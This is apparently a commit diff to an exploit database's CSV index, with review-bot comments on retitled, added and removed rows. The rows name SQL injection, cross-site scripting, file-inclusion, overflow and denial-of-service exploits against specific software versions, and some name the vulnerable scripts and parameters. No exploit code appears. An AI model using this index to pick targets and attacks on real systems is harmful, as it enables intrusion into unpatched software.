DB: 2016-12-14
7 new exploits

Microsoft Internet Explorer 9 IEFRAME - CSelectionInteractButtonBehavior::_UpdateButtonLocation Use-After-Free (MS13-047)
Xitami Web Server 5.0a0 - Denial of Service
OpenSSL 1.1.0a/1.1.0b - Denial of Service
Serva 3.0.0 HTTP Server - Denial of Service
iOS 10.1.x - Certificate File Memory Corruption
OpenBSD 4.0 - (vga) Privilege Escalation
OpenBSD 4.0 - 'vga' Privilege Escalation
10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow
MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections
MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections
AShop Deluxe 4.x - (catalogue.php cat) SQL Injection
AShop Deluxe 4.x - 'catalogue.php' SQL Injection
HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion
HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion
CAT2 - (spaw_root) Local File Inclusion
CAT2 - 'spaw_root' Parameter Local File Inclusion
MyBloggie 2.1.3 - search.php SQL Injection
MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting
MyBloggie 2.1.x - Multiple Remote File Inclusion
MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion
MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion
AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting
AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting
AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting
AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting
AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting
AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting
AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting
MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting
MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting
MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting
MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting
Smart Guard Network Manager 6.3.2 - SQL Injection
WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery
parent 96bd05d39d
commit b080c70f8b
10 changed files with 536 additions and 53 deletions
59
files.csv
@ -3556,6 +3556,7 @@ id,file,description,date,author,platform,type,port
27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0
27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0
27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 IEFRAME - CSelectionInteractButtonBehavior::_UpdateButtonLocation Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0
27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0
27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0
28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",windows,dos,0
@ -3996,7 +3997,7 @@ id,file,description,date,author,platform,type,port
31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,"Stefan Petrushevski",windows,dos,0
40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,sm,windows,dos,0
31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0
31818,platforms/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0
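Review bot: the 40849 row's author field changes from "Stefan Petrushevski" to the bare handle `sm`, and the commit message ("7 new exploits" plus a list of titles) says nothing about a re-attribution. If this was requested by the author, say so in the message and confirm it matches the attribution inside platforms/windows/dos/40849.py; otherwise a full name is being replaced by an opaque handle with no trail.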
@ -5300,6 +5301,9 @@ id,file,description,date,author,platform,type,port
40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
40896,platforms/windows/dos/40896.html,"Microsoft Internet Explorer 9 MSHTML - CElement::HasFlag Memory Corruption",2016-12-09,Skylined,windows,dos,0
40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0
40905,platforms/windows/dos/40905.py,"Serva 3.0.0 HTTP Server - Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
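Review bot: the new 40899 row files the OpenSSL 1.1.0a/1.1.0b PoC under platform `linux`, but the script added in this same commit carries `# Platform: Multiple` in its header, and the 27993 FreeType row in the first hunk shows `multiple` is the existing convention for cross-platform DoS entries. Either the CSV platform or the script header should change; if the CSV changes, the file path moves out of platforms/linux/dos/ as well.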
@ -5865,7 +5869,7 @@ id,file,description,date,author,platform,type,port
5667,platforms/windows/local/5667.py,"VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal Exploit",2008-05-23,j0rgan,windows,local,0
5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - 'dne2000.sys' Kernel Ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0
5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)",2008-06-26,Shinnok,windows,local,0
5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - (vga) Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - 'vga' Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,windows,local,0
6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0
6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0
@ -8692,6 +8696,7 @@ id,file,description,date,author,platform,type,port
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -16370,7 +16375,7 @@ id,file,description,date,author,platform,type,port
2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0
2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote File Inclusion",2006-08-02,beford,php,webapps,0
2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0
2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0
@ -19064,12 +19069,12 @@ id,file,description,date,author,platform,type,port
5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure",2008-06-30,Nine:Situations:Group,php,webapps,0
5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0
5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - 'catalogue.php' SQL Injection",2008-06-30,n0c0py,php,webapps,0
5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0
5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Parameter Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5984,platforms/php/webapps/5984.txt,"Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0
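Review bot: the 5976 retitle drops the vulnerable parameter name: "(catalogue.php cat) SQL Injection" becomes "'catalogue.php' SQL Injection", while the 5981 and 5983 retitles in this same hunk keep theirs ("'hm' Parameter", "'spaw_root' Parameter"). Suggest "AShop Deluxe 4.x - 'catalogue.php' 'cat' Parameter SQL Injection" or equivalent so the three rows follow one pattern and the parameter is not lost from the index.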
@ -28115,7 +28120,6 @@ id,file,description,date,author,platform,type,port
26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0
26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0
26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0
26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - search.php SQL Injection",2005-10-06,trueend5,php,webapps,0
26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0
26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0
26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - newmsg.php fid Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0
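Review bot: the hunk counts (-28115,7 +28120,6) show one line removed, and the only row here that appears in the commit message is 26326 "MyBloggie 2.1.3 - search.php SQL Injection", so this is a deletion, not a retitle, yet the message gives no reason. Please state why it is dropped (duplicate, dead PoC) and say whether platforms/php/webapps/26326.html is removed with it; otherwise the index and the tree drift apart.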
@ -28941,16 +28945,16 @@ id,file,description,date,author,platform,type,port
27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0
27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0
27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0
27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27390,platforms/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
27391,platforms/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - calendar.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
27392,platforms/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - forums.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
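Review bot: the 27387 retitle is inconsistent with its nine siblings: "add.php trackback_url Parameter" becomes "'trackback_url' Parameter", keeping the parameter and dropping the script, whereas 27380 to 27389 otherwise keep the script name ('upload.php', 'del.php', ...) and drop the parameter. Either make 27387 "'add.php' Cross-Site Scripting" for consistency, or keep both script and parameter in all ten rows, since the old titles carried detail that is useful for triage (for example the `errormsg` parameter shared by 27383 to 27386).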
@ -29372,7 +29376,6 @@ id,file,description,date,author,platform,type,port
27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Inclusion",2006-06-02,ERNE,php,webapps,0
27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0
27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0
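Review bot: the counts (-29372,7 +29376,6) show a row removed, and the candidate is 27957 "MyBloggie 2.1.x - Multiple Remote File Inclusion" (2006-06-02, ERNE); the 28366 row retitled in the next hunk carries the same date and nearly the same title, so this reads as a duplicate merge, but the commit message only lists the title. Say that 27957 is removed as a duplicate of 28366 and confirm platforms/php/webapps/27957.txt is dealt with, so nobody later re-adds it from the orphaned file.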
@ -29623,7 +29626,7 @@ id,file,description,date,author,platform,type,port
28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0
28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0
28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0
28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
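Review bot: the 28366 retitle drops "Multiple" ("MyBloggie_Root_Path Parameter Multiple Remote File Inclusion" becomes "'MyBloggie_Root_Path' Parameter Remote File Inclusion"); if the advisory covers several include points that all take that parameter, "Multiple" is the information a reader uses to know one fix is not enough, so keep it. Unrelated to this change but visible here: the row's date 2006-06-02 sits among 2006-08-09/10 entries, worth checking against the file while you are in it.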
@ -30379,12 +30382,12 @@ id,file,description,date,author,platform,type,port
29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0
29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0
29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - search.asp Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0
29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0
29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
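Review bot: the six AShop 4.5 retitles strip path prefixes along with parameter names, so 29381 and 29382 lose `admin/` ("admin/editcatalogue.php" and "admin/salesadmin.php" become 'editcatalogue.php' and 'salesadmin.php'). That prefix is what tells a reader the XSS sits in the administrative interface rather than the storefront, which changes who is exposed; suggest keeping it as 'admin/editcatalogue.php' and 'admin/salesadmin.php' in those two rows.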
@ -30458,9 +30461,9 @@ id,file,description,date,author,platform,type,port
29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - new.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0
